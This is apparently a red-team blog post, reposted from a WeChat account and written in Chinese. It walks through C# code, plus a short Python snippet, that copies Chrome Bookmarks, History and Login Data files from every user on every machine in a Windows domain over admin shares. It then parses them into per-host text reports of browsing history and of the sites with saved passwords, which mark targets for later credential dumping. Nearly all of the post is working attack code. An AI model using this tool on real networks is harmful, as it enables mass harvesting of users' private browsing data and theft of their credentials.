上文说了内网批量获取域内文件,在一些场景里面我们需要获取某台机器权限,但是可能之对外开放了80,22等端口无法通过常规手段getshell,可能在某台it个人pc存放了密码本。然而还有一些情况就是我们只需要获取某台web的后台权限即可,在一些内网环境上千台的机器,我们需要一台一台去翻找浏览器密码,就相当麻烦,于是我们可以批量解析域内每台机器,以及对应机器上的用户的chrome浏览器的书签和历史记录以及是否保存了密码为文本,然后再针对的上那台机器去dump密码,可以节约很多的时间成本。
0x01 获取chrome相关文件
chrome浏览器的一些保存文件在
C:UsersAdministratorAppDataLocalGoogleChromeUser DataDefault
Bookmarks 书签
History 历史记录
Login Data 保存密码相关记录
我们按照之前的获取域内文件同理的方法,这里就不过多讲解了。创建machine.txt,逐行读取机器。
获取当前路径创建TargetChromeFiles目录
string currentpath = Directory.GetCurrentDirectory();
string DesktopFiles = currentpath + "\TargetChromeFiles";
遍历users目录如果存在“`C:UsersAdministratorAppDataLocalGoogleChromeUser DataDefault“如果存在创建机器名文件夹以及对应的用户名文件夹
string userpath = @"\" + machine + @"c$users";
var user_list = Directory.EnumerateDirectories(userpath);
foreach (string user in user_list)
{
string ChromePath = user + "\AppData\Local\Google\Chrome\User Data\Default";
string username = substring(user);
if (Directory.Exists(ChromePath)){
string MachineFolder = DesktopFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);
string UserFolder = MachineFolder + "\" + username;
Directory.CreateDirectory(UserFolder);
}
}
获取对应机器以及用户的历史记录文件
string historyPath = ChromePath + "\History";
if (File.Exists(historyPath))
{
string historyfile = UserFolder + "\History";
StreamWriter history_file = File.CreateText(historyfile);
history_file.Close();
bool isrewrite = true;
File.Copy(historyPath, historyfile, isrewrite);
}
如果存在就继续创建History文件,同理书签和密码保存位置
string loginPath = ChromePath + "\Login Data";
if (File.Exists(loginPath))
{
string loginfile = UserFolder + "\Login Data";
StreamWriter login_file = File.CreateText(loginfile);
login_file.Close();
bool isrewrite = true;
File.Copy(loginPath, loginfile, isrewrite);
}
string BookPath = ChromePath + "\Bookmarks";
if (File.Exists(BookPath))
{
string bookfile = UserFolder + "\Bookmarks";
StreamWriter book_file = File.CreateText(bookfile);
book_file.Close();
bool isrewrite = true;
File.Copy(BookPath, bookfile, isrewrite);
}
dump效果
Login Data
为sqlite保存形式
所以我们需要批量解析本地TargetChromeFiles
目录内的所有文件为文本形式。把结果生在在本地的output_TargetChromeInfos
目录。
首先创建该目录
string currentpath = Directory.GetCurrentDirectory();
string getchromeinfopath = currentpath + "\output_TargetChromeInfos";
Directory.CreateDirectory(getchromeinfopath);
遍历TargetChromeFiles
目录所有机器,创建对应的机器目录
string ChromeFilesPath = currentpath + "\TargetChromeFiles";
if (Directory.Exists(ChromeFilesPath))
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[*]开始解析chrome浏览器信息");
Console.ForegroundColor = ConsoleColor.White;
var machine_list = Directory.EnumerateDirectories(ChromeFilesPath);
foreach (string machine in machine_list)
{
Console.ForegroundColor = ConsoleColor.Yellow;
string out_machine_info = substring(machine); //获取结尾地址
Console.WriteLine("[*]" + out_machine_info);
Console.ForegroundColor = ConsoleColor.White;
//创建本地机器文件夹
string getmachinepath = getchromeinfopath + "\" + out_machine_info;
Directory.CreateDirectory(getmachinepath);
继续创建用户目录
var user_list = Directory.EnumerateDirectories(machine);
foreach (string user in user_list)
{
Console.ForegroundColor = ConsoleColor.Yellow;
string out_user_info = substring(user);
Console.WriteLine(" " + out_user_info);
Console.ForegroundColor = ConsoleColor.White;
string getuserpath = getmachinepath + "\" + out_user_info;
Directory.CreateDirectory(getuserpath);
因为书签是json格式,这里我没有做任何处理。直接把内容写进out目录的Bookmarks文件了。
string book_path = user + "\Bookmarks";
if (File.Exists(book_path))
{
string getbookpath = getuserpath + "\Bookmarks";
StreamWriter bookmark = File.CreateText(getbookpath);
bookmark.Close();
File.Copy(book_path, getbookpath, true);
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(" [*]bookmarks parse success");
Console.ForegroundColor = ConsoleColor.White;
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(" [-]bookmarks not found");
Console.ForegroundColor = ConsoleColor.White;
}
如果想要好看点可以如果代码来美化一下即可。
from os import name
import re
f = open('C:/Users/Administrator/AppData/Local/Google/Chrome/User Data/Default/Bookmarks',encoding='UTF-8')
while True:
line = f.readline()
if not line:
break
else:
try:
line.decode('utf8')
except:
res = (str(line))
url_re = re.compile('"url": "(.*?)"',re.I|re.S)
name_re = re.compile('"name": "(.*?)"',re.I|re.S)
url_result = url_re.findall(res)
name_result = name_re.findall(res)
for url in url_result:
print(url)
看到历史记录文件
我们获取想要的即可
string History_path = user + "\History";
if (File.Exists(History_path))
{
string gethistorypath = getuserpath + "\History.txt";
StreamWriter history = File.CreateText(gethistorypath);
history.Close();
SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + History_path);
connect.Open();
SQLiteCommand fcmd = connect.CreateCommand();
fcmd.CommandText = @"select * from urls";
fcmd.CommandType = CommandType.Text;
SQLiteDataReader r = fcmd.ExecuteReader();
string HistoryHostof = "host:" + out_machine_info + "rn";
string HistoryMemberof = "user:" + out_user_info + "rnrn";
File.AppendAllText(gethistorypath, HistoryHostof);
File.AppendAllText(gethistorypath, HistoryMemberof);
while (r.Read())
{
string title = (string)r["title"];
string out_title = "title:" + title + "rn";
string url = (string)r["url"];
string out_url ="url:" + url + "rnrn";
File.AppendAllText(gethistorypath, out_title);
File.AppendAllText( gethistorypath, out_url);
}
connect.Close();
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(" [*]history parse success");
Console.ForegroundColor = ConsoleColor.White;
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(" [-]history not found");
Console.ForegroundColor = ConsoleColor.White;
}
关于csharp操作sqlite这里不做过多介绍,网上也有很多相关代码和教程。
最近就是获取密码保存的文件记录
string LoginData_path = user + "\Login Data";
if (File.Exists(LoginData_path))
{
string getloginypath = getuserpath + "\Login Data.txt";
StreamWriter login = File.CreateText(getloginypath);
login.Close();
SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + LoginData_path);
connect.Open();
SQLiteCommand fcmd = connect.CreateCommand();
fcmd.CommandText = @"select * from logins";
fcmd.CommandType = CommandType.Text;
SQLiteDataReader r = fcmd.ExecuteReader();
string HistoryHostof = "host:" + out_machine_info + "rn";
string HistoryMemberof = "user:" + out_user_info + "rnrn";
File.AppendAllText(getloginypath, HistoryHostof);
File.AppendAllText(getloginypath, HistoryMemberof);
List<String> Field = new List<string>();
while (r.Read())
{
string origin_url = (string)r["origin_url"];
string out_origin_url = "origin_url:" + origin_url + "rn";
string acition_url = (string)r["action_url"];
string out_acition_url = "acition_url:" + acition_url + "rn";
Int64 blacklisted_by_user = (Int64)r["blacklisted_by_user"];
string out_blacklisted_by_user = "blacklisted_by_user:" + blacklisted_by_user + "rn";
File.AppendAllText(getloginypath, out_origin_url);
File.AppendAllText(getloginypath, out_acition_url);
File.AppendAllText(getloginypath, out_blacklisted_by_user);
}
connect.Close();
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(" [*]login data parse success");
Console.ForegroundColor = ConsoleColor.White;
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(" [-]login data not found");
Console.ForegroundColor = ConsoleColor.White;
}
当我们获取到blacklisted_by_user
为1说明目标开启了不保存该网站密码,反之则保存。
这里测试环境为本机环境,经过大量授权实战环境测试,目前没有发现问题。
最后效果。
原文始发于微信公众号(红队蓝军):域内批量解析chrome浏览器